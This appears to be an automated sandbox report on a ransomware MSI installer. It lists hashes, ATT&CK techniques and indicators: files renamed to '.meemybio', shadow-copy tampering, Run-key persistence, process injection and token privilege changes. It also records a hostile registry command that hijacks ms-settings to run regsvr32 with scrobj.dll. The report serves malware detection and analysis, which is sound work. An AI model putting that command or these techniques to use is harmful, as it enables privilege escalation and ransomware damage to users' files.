9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
23-05-2022 05:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MAG.msi
Size

96KB
MD5

957d0c81c985609c580565a0323a14cd
SHA1

d8d46413409a14a1ae407107016e28074c6824d5
SHA256

9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be
SHA512

0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52

Score

9^/10

persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ImportTrace.tif => C:\Users\Admin\Pictures\ImportTrace.tif.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\StepOpen.tiff => C:\Users\Admin\Pictures\StepOpen.tiff.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\SubmitUnregister.crw => C:\Users\Admin\Pictures\SubmitUnregister.crw.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\CompressSend.png => C:\Users\Admin\Pictures\CompressSend.png.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\ExportInitialize.png => C:\Users\Admin\Pictures\ExportInitialize.png.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\MountTest.png => C:\Users\Admin\Pictures\MountTest.png.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\PushConvertFrom.tif => C:\Users\Admin\Pictures\PushConvertFrom.tif.meemybio	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\RemoveExport.tif => C:\Users\Admin\Pictures\RemoveExport.tif.meemybio	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\StepOpen.tiff	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

1312 MsiExec.exe

pid	process
1312	MsiExec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

MsiExec.exe

description	pid	process	target process
PID 1312 set thread context of 2384	1312	MsiExec.exe	sihost.exe
PID 1312 set thread context of 2396	1312	MsiExec.exe	svchost.exe
PID 1312 set thread context of 2492	1312	MsiExec.exe	taskhostw.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\107f4e32-2c97-4e9b-93cb-053a08abb1ac.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523071826.pma	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\e57bb8f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBDB2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC39F.tmp	msiexec.exe
File created	C:\Windows\Installer\e57bb8f.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA}	msiexec.exe
File created	C:\Windows\Installer\e57bb91.msi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exevssvc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000005a4eb8c89d443e990000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800005a4eb8c80000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809005a4eb8c8000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000005a4eb8c800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000005a4eb8c800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

2332 vssadmin.exe
1268 vssadmin.exe
964 vssadmin.exe
2140 vssadmin.exe
60 vssadmin.exe
2620 vssadmin.exe
Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe

pid	process
2332	vssadmin.exe
1268	vssadmin.exe
964	vssadmin.exe
2140	vssadmin.exe
60	vssadmin.exe
2620	vssadmin.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 18 IoCs

Processes:

msedge.exesihost.exeregsvr32.exeregsvr32.exeregsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open	regsvr32.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
4532	msiexec.exe
4532	msiexec.exe
1312	MsiExec.exe
1312	MsiExec.exe
8	msedge.exe
8	msedge.exe
1440	msedge.exe
1440	msedge.exe
2768	identity_helper.exe
2768	identity_helper.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MsiExec.exe

pid process

1312 MsiExec.exe
1312 MsiExec.exe
1312 MsiExec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

1440 msedge.exe
1440 msedge.exe
1440 msedge.exe
1440 msedge.exe
1440 msedge.exe

pid	process
1312	MsiExec.exe
1312	MsiExec.exe
1312	MsiExec.exe

pid	process
1440	msedge.exe
1440	msedge.exe
1440	msedge.exe
1440	msedge.exe
1440	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exesrtasks.exe

description	pid	process
Token: SeShutdownPrivilege	5104	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5104	msiexec.exe
Token: SeSecurityPrivilege	4532	msiexec.exe
Token: SeCreateTokenPrivilege	5104	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	5104	msiexec.exe
Token: SeLockMemoryPrivilege	5104	msiexec.exe
Token: SeIncreaseQuotaPrivilege	5104	msiexec.exe
Token: SeMachineAccountPrivilege	5104	msiexec.exe
Token: SeTcbPrivilege	5104	msiexec.exe
Token: SeSecurityPrivilege	5104	msiexec.exe
Token: SeTakeOwnershipPrivilege	5104	msiexec.exe
Token: SeLoadDriverPrivilege	5104	msiexec.exe
Token: SeSystemProfilePrivilege	5104	msiexec.exe
Token: SeSystemtimePrivilege	5104	msiexec.exe
Token: SeProfSingleProcessPrivilege	5104	msiexec.exe
Token: SeIncBasePriorityPrivilege	5104	msiexec.exe
Token: SeCreatePagefilePrivilege	5104	msiexec.exe
Token: SeCreatePermanentPrivilege	5104	msiexec.exe
Token: SeBackupPrivilege	5104	msiexec.exe
Token: SeRestorePrivilege	5104	msiexec.exe
Token: SeShutdownPrivilege	5104	msiexec.exe
Token: SeDebugPrivilege	5104	msiexec.exe
Token: SeAuditPrivilege	5104	msiexec.exe
Token: SeSystemEnvironmentPrivilege	5104	msiexec.exe
